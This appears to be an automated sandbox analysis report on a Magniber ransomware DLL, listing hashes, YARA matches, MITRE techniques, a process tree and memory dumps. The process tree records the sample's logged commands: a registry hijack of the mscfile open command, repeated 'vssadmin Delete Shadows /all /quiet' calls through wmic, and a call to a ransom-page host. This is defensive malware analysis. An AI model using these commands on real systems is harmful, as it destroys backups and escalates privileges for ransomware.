magniber | 4bf92967b0d2aabec0cb16f3c3792e714857db3e41ad5768e3493780b9342465

General

Target

cd711f77c71b93a29494bba27afebb32.dll
Size

38KB
MD5

cd711f77c71b93a29494bba27afebb32
SHA1

a0d84f184191454e90d4bb2b7df52f8428a3b387
SHA256

4bf92967b0d2aabec0cb16f3c3792e714857db3e41ad5768e3493780b9342465
SHA512

5ad95f1fd3365a51d6438f054ecc7b849a3ef8197592403504e227402629b7b482e403e652aa0da36c7dd4f6733351639497c1de6d58df51876b906d7b261bec
SSDEEP

768:e04Jtvq/PbXsmSh5Mj13C05bRUSMI2mpKghGR5ZL4Z/DtChqYWrYBZF:MJtvupS/Mj13CAUTI2mpF85ZcZ/JSN

Score

10^/10

Malware Config

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/2508-41-0x0000000001FD0000-0x0000000002813000-memory.dmp	family_magniber
behavioral1/memory/1116-281-0x0000000002170000-0x0000000002174000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (85) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2508 set thread context of 1116	2508	rundll32.exe	12
PID 2508 set thread context of 1172	2508	rundll32.exe	80
PID 2508 set thread context of 1200	2508	rundll32.exe	79
PID 2508 set thread context of 1632	2508	rundll32.exe	78

Interacts with shadow copies 2 TTPs 5 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1280	vssadmin.exe
1944	vssadmin.exe
1916	vssadmin.exe
1716	vssadmin.exe
2852	vssadmin.exe

Modifies registry class 7 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell\open	taskhost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2464	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2508	rundll32.exe
2508	rundll32.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
2508	rundll32.exe
2508	rundll32.exe
2508	rundll32.exe
2508	rundll32.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1200	Explorer.EXE
Token: SeShutdownPrivilege	1200	Explorer.EXE
Token: SeShutdownPrivilege	1200	Explorer.EXE

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
1200	Explorer.EXE
1200	Explorer.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 2464	1116	taskhost.exe	73
PID 1116 wrote to memory of 2464	1116	taskhost.exe	73
PID 1116 wrote to memory of 2464	1116	taskhost.exe	73
PID 1116 wrote to memory of 2576	1116	taskhost.exe	18
PID 1116 wrote to memory of 2576	1116	taskhost.exe	18
PID 1116 wrote to memory of 2576	1116	taskhost.exe	18
PID 1116 wrote to memory of 2268	1116	taskhost.exe	17
PID 1116 wrote to memory of 2268	1116	taskhost.exe	17
PID 1116 wrote to memory of 2268	1116	taskhost.exe	17
PID 2268 wrote to memory of 1536	2268	cmd.exe	15
PID 2268 wrote to memory of 1536	2268	cmd.exe	15
PID 2268 wrote to memory of 1536	2268	cmd.exe	15

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2268
- C:\Windows\system32\cmd.exe
  cmd /c "start http://46b05248c6a030d01aokdpgmu.iflook.club/okdpgmu^&2^&47025584^&85^&383^&12"
  2⤵
  PID:2576
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://46b05248c6a030d01aokdpgmu.iflook.club/okdpgmu&2&47025584&85&383&12
    3⤵
    PID:2332
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2332 CREDAT:275457 /prefetch:2
      4⤵
      PID:1596
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2464

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
1⤵
PID:1536

C:\Windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
1⤵
PID:1668
- C:\Windows\system32\wbem\WMIC.exe
  C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
  2⤵
  PID:696

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
1⤵
PID:1788

C:\Windows\system32\CompMgmtLauncher.exe
CompMgmtLauncher.exe
1⤵
PID:2612
- C:\Windows\system32\wbem\wmic.exe
  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2180

C:\Windows\system32\CompMgmtLauncher.exe
CompMgmtLauncher.exe
1⤵
PID:2780
- C:\Windows\system32\wbem\wmic.exe
  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2428

C:\Windows\system32\wbem\wmic.exe
"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
1⤵
PID:2880

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Interacts with shadow copies
PID:1944

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2452

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Interacts with shadow copies
PID:1916

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Interacts with shadow copies
PID:1716

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Interacts with shadow copies
PID:2852

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Interacts with shadow copies
PID:1280

C:\Windows\system32\wbem\wmic.exe
"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
1⤵
PID:2072

C:\Windows\system32\wbem\wmic.exe
"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
1⤵
PID:2348

C:\Windows\system32\CompMgmtLauncher.exe
CompMgmtLauncher.exe
1⤵
PID:2712

C:\Windows\system32\CompMgmtLauncher.exe
CompMgmtLauncher.exe
1⤵
PID:1960

C:\Windows\system32\CompMgmtLauncher.exe
CompMgmtLauncher.exe
1⤵
PID:2900

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
PID:2756

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
PID:2340

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
PID:2468

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
PID:2384

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
PID:3004

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
1⤵
PID:2128

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
1⤵
PID:3008

C:\Windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
1⤵
PID:808

C:\Windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
1⤵
PID:1036

C:\Windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
1⤵
PID:500

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\cd711f77c71b93a29494bba27afebb32.dll,#1
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2508

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1632

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:1200

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1172

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

2

T1070

File Deletion

2

T1070.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1116-0-0x0000000002170000-0x0000000002174000-memory.dmp

Filesize
16KB

Download
memory/1116-281-0x0000000002170000-0x0000000002174000-memory.dmp

Filesize
16KB

Download
memory/1632-322-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/1632-305-0x0000000001D20000-0x0000000001D30000-memory.dmp

Filesize
64KB

Download
memory/1632-311-0x0000000001D80000-0x0000000001D90000-memory.dmp

Filesize
64KB

Download
memory/2508-153-0x0000000001E80000-0x0000000001E81000-memory.dmp

Filesize
4KB

Download
memory/2508-230-0x0000000001ED0000-0x0000000001ED1000-memory.dmp

Filesize
4KB

Download
memory/2508-172-0x0000000001E90000-0x0000000001E91000-memory.dmp

Filesize
4KB

Download
memory/2508-41-0x0000000001FD0000-0x0000000002813000-memory.dmp

Filesize
8.3MB

Download
memory/2508-139-0x0000000000510000-0x0000000000511000-memory.dmp

Filesize
4KB

Download
memory/2508-282-0x0000000002B10000-0x0000000002B11000-memory.dmp

Filesize
4KB

Download
memory/2508-85-0x0000000000130000-0x0000000000131000-memory.dmp

Filesize
4KB

Download
memory/2508-280-0x0000000001F00000-0x0000000001F01000-memory.dmp

Filesize
4KB

Download
memory/2508-279-0x0000000001EF0000-0x0000000001EF1000-memory.dmp

Filesize
4KB

Download
memory/2508-251-0x0000000001EE0000-0x0000000001EE1000-memory.dmp

Filesize
4KB

Download
memory/2508-213-0x0000000001EA0000-0x0000000001EA1000-memory.dmp

Filesize
4KB

Download
memory/2508-113-0x0000000000500000-0x0000000000501000-memory.dmp

Filesize
4KB

Download
memory/2508-66-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing